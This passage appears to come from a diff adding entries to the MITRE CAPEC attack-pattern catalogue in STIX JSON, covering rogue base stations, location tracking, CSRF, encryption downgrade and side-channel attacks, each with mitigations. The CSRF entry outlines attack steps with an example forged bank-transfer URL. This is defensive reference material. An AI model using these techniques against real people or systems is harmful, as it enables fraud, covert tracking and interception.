"x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control Wi-Fi data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Commercial defensive technology that monitors for rogue Wi-Fi access points, adversary-in-the-middle attacks, and anomalous activity with the mobile device baseband radios.", + "id": "course-of-action--3cd5d16f-646e-42e0-b22d-2a14d4bec7b1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-615-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6566c16f-35b1-476c-b9e5-0399cc905c82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3cd5d16f-646e-42e0-b22d-2a14d4bec7b1", + "target_ref": "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary provides a malicious version of a resource at a location that is similar to the expected location of a legitimate resource. After establishing the rogue location, the adversary waits for a victim to visit the location and access the malicious resource.", + "external_references": [ + { + "external_id": "CAPEC-616", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/616.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Establish Rogue Location", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary's subsequent actions.)" + ], + "Integrity": [ + "Other (Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary's subsequent actions.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36" + ], + "x_capec_prerequisites": [ + "A resource is expected to available to the user." + ], + "x_capec_skills_required": { + "Low": "Adversaries can often purchase low-cost technology to implement rogue access points." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker imitates a cellular base station with their own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.", + "external_references": [ + { + "external_id": "CAPEC-617", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/617.html" + } + ], + "id": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Rogue Base Station", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control cellular data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Passively monitor cellular network connection for real-time threat detection and logging for manual review.", + "id": "course-of-action--b183808c-b043-46e6-a10a-acb7644ea511", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-617-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c58917b8-55ad-4997-bfa1-356553087aa1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b183808c-b043-46e6-a10a-acb7644ea511", + "target_ref": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker uses knowledge of the target’s mobile phone number (i.e., the number associated with the SIM used in the retransmission device) to cause the cellular network to send broadcast messages to alert the mobile device. Since the network knows which cell tower the target’s mobile device is attached to, the broadcast messages are only sent in the Location Area Code (LAC) where the target is currently located. By triggering the cellular broadcast message and then listening for the presence or absence of that message, an attacker could verify that the target is in (or not in) a given location.", + "external_references": [ + { + "external_id": "CAPEC-618", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/618.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "description": "Denis Foo Kune, John Koelndorfer, Nicholas Hopper, Yongdae Kim, Location Leaks on the GSM Air Interface, University of Minnesota", + "external_id": "REF-487", + "source_name": "reference_from_CAPEC", + "url": "https://www-users.cs.umn.edu/~hoppernj/celluloc.pdf" + } + ], + "id": "attack-pattern--3b775ca7-4c1d-4078-bc7b-29907b9596f7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Broadcast Message Request", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_consequences": { + "Other": [ + "Other (An attacker could verify that the target is in (or not in) a given location.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "The attacker must have knowledge of the target’s mobile phone number." + ], + "x_capec_skills_required": { + "Low": "Open source and commercial tools are available for this attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changing of mobile number.", + "id": "course-of-action--272a376e-ec84-4fcd-abb5-00cba0e3c7e0", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-618-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--79aff368-471d-46f4-803b-6584f3497601", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--272a376e-ec84-4fcd-abb5-00cba0e3c7e0", + "target_ref": "attack-pattern--3b775ca7-4c1d-4078-bc7b-29907b9596f7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively monitors the signal strength of the target’s cellular RF signal or WiFi RF signal and uses the strength of the signal (with directional antennas and/or from multiple listening points at once) to identify the source location of the signal. Obtaining the signal of the target can be accomplished through multiple techniques such as through Cellular Broadcast Message Request or through the use of IMSI Tracking or WiFi MAC Address Tracking.", + "external_references": [ + { + "external_id": "CAPEC-619", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/619.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--d900a0ea-7dd6-4ed8-a1bf-ac498e68d9e5", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Signal Strength Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_skills_required": { + "Low": "Commercial tools are available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.", + "external_references": [ + { + "external_id": "CAPEC-62", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/62.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1275", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1275.html" + }, + { + "description": "Cross-Site Request Forgery", + "external_id": "09", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Request-Forgery" + }, + { + "description": "Cross Site Request Forgery (CSRF)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/csrf" + }, + { + "description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH", + "external_id": "REF-62", + "source_name": "reference_from_CAPEC", + "url": "https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-602", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html" + } + ], + "id": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Cross Site Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Session Riding" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.\n The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.\n The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore target website: The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.

    2. Techniques
    Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server
    Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server
    View HTML source of web pages that contain links or buttons that perform actions of interest.

Experiment

  1. Create a link that when clicked on, will execute the interesting functionality.: The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.

    2. Techniques
    Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)
    Create a form that will submit a POST request (e.g.

Exploit

  1. Convince user to click on link: Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.

    2. Techniques
    Execute a phishing attack and send the user an e-mail convincing them to click on a link.
    Execute a stored XSS attack on a website to permanently embed the malicious link into the website.
    Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.
    Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4" + ], + "x_capec_resources_required": [ + "All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with.", + "id": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.", + "id": "course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e4e7c46-5802-4623-bfb2-726d5643649a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions.", + "id": "course-of-action--d48ac0ea-9821-4d1d-b819-78cf36562e97", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5334f93e-090e-4dc7-9634-9cf8d617820f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d48ac0ea-9821-4d1d-b819-78cf36562e97", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context.", + "id": "course-of-action--77756b2a-ad30-4992-acdb-13c8dae467d8", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e911413e-496d-4b6e-afff-88e8e3302abb", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--77756b2a-ad30-4992-acdb-13c8dae467d8", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker forces the encryption level to be lowered, thus enabling a successful attack against the encrypted data.", + "external_references": [ + { + "external_id": "CAPEC-620", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/620.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + }, + { + "description": "Weaken Encryption", + "external_id": "T1600", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1600" + } + ], + "id": "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Drop Encryption Level", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).", + "external_references": [ + { + "external_id": "CAPEC-621", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/621.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Analysis of Packet Timing and Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes." + ], + "x_capec_skills_required": { + "High": "These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Distort packet sizes and timing at VPN layer by adding padding to normalize packet sizes and timing delays to reduce information leakage via timing.", + "id": "course-of-action--3d82800d-a207-4cf5-8acb-34298fed624c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-621-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce899b44-526f-4892-80d2-510f96e94715", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3d82800d-a207-4cf5-8acb-34298fed624c", + "target_ref": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.", + "external_references": [ + { + "external_id": "CAPEC-622", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/622.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Electromagnetic Side-Channel Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data. For mobile devices, depending on which keys are compromised, the attacker may be able to decrypt VOIP communications, impersonate the targeted caller, or access the enterprise VPN server.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Proximal access to the device." + ], + "x_capec_skills_required": { + "Medium": "Sophisticated attack, but detailed techniques published in the open literature." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize side-channel resistant implementations of all crypto algorithms.", + "id": "course-of-action--2e9301ad-e907-414c-9bac-0be1517b0112", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--518cf128-c5dd-41bf-920c-c59464ae3e89", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e9301ad-e907-414c-9bac-0be1517b0112", + "target_ref": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of all devices that contain secret key information. (even when devices are not in use)", + "id": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef792ac3-e23f-463b-8456-e2cb9549a020", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "target_ref": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. Capturing these emissions can help an adversary understand what the device is doing.", + "external_references": [ + { + "external_id": "CAPEC-623", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/623.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--3d5bbdf7-b642-43b4-b4be-d9f35923380d", + "modified": 